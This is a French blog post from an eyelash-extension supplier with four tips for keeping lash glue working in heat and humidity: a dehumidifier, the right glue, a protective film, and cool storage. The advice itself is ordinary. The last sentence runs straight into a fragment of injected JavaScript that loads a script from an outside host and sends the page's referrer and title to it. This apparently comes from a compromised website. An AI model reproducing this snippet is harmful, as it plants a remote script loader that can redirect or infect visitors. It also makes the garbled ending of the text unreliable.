News

4 trucs pour conserver votre colle à extension de cils performante

Rédigé par Elissa Catégorie: Blogue

shutterstock_154087697_reduit

L’été est à nos portes! Mais n’oubliez pas que l’humidité est l’ennemi premier de toutes les colles pour extension de cils. Découvrez comment vous pouvez la conserver en bon état malgré la chaleur accablante.

Que se passe-t-il avec la colle?
«J’ai besoin de 2 ou 3 gouttes sur le galet pour réussir à faire une retouche et encore… »

Rassurez-vous, la colle n’a pas changé sa recette. Bien qu’elle ait de multiples qualités techniques, il faut comprendre qu’elle est sensible aux variations de température et à l’humidité. Même phénomène si la ventilation est à proximité du plan de travail ou qu’une fenêtre est ouverte.

Généralement, la climatisation aide à diminuer l’humidité d’une pièce, mais dans bien des cas, ce n’est pas suffisant pour éviter le séchage plus rapide sur le galet.

Ce qu’il faut savoir
Les colles Onyx et Premium sont plus sensibles que la HD à la chaleur et à l’humidité. Il est fort possible que vous ayez besoin de plusieurs gouttes pour une même pose. Le fait qu’elle soit noire lui confère davantage cette particularité.

1. Utilisez un déshumidificateur dans votre cabine

Plus votre pièce est humide, plus la colle est instable et s’épaissit sur le galet de jade. Par conséquent, vous aurez besoin de plus de gouttes de colle pour votre pose ou votre retouche d’extensions de cils. Pour vous aider, nous vous recommandons d’utiliser un déshumidificateur dans votre cabine.

Votre pièce devrait avoir une température ambiante entre 21 et 23 C°, et idéalement une humidité variant entre 30% et 55%. Les techniciennes qui ont leur cabine en salon de coiffure sont sujettes à une humidité plus élevée (séchoir, eau, etc.) et ce, même si elles ont un espace clos et climatisée ; en hiver comme en été.

2. Choisissez une colle qui convient à votre environnement
Plus la colle contient de pigments, plus elle est sensible à l’humidité. C’est pourquoi la colle HD dure plus longtemps sur le galet de jade.

3. Utilisez une pellicule de protection
Afin de prolonger la durée de vie de votre goutte de colle, utilisez une pellicule de protection pour galet de jade. La pellicule permettra de couper l’humidité qui pourrait se trouver sur votre galet de jade.

Déposez la goutte de colle sur le galet de jade en prenant soin d’obtenir un dôme ayant au moins un diamètre de 8mm. Lorsque vous plongez l’extension, faites attention de ne pas défaire la forme de votre goutte et évitez de toucher au galet pour ne pas faire tomber la gouttelette attachée à la base de l’extension.

4. Conservez votre colle au frais
Lorsque non utilisée, gardez votre bouteille de colle fermée dans un endroit sec et frais (préférablement au réfrigérateur) en position verticale afin de la conserver le plus longtemps possible. Ne jamais la laisser dans la voiture au risque de la geler durant l’hiver, ou à l’inverse, de la faire cuire l’été!

Ce qu’il ne faut pas oublier
Suite à l’ouverture de la bouteille, jetez le bouchon de transport et refermez toujours la bouteille à l’aide de l’aiguille fournie. Vous éviterez que l’embout ne se soude si par mégarde, votre bouteille bascule sur le côté dans votre frigo!

Utilisez le Nanomist toujours en fin de pose… Votre cliente appréciera la fraîcheur, les vapeurs de colle seront dissipées et la polymérisation de la colle sera accélérée!

Alors Mesdames, à vos pinces et bon été!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;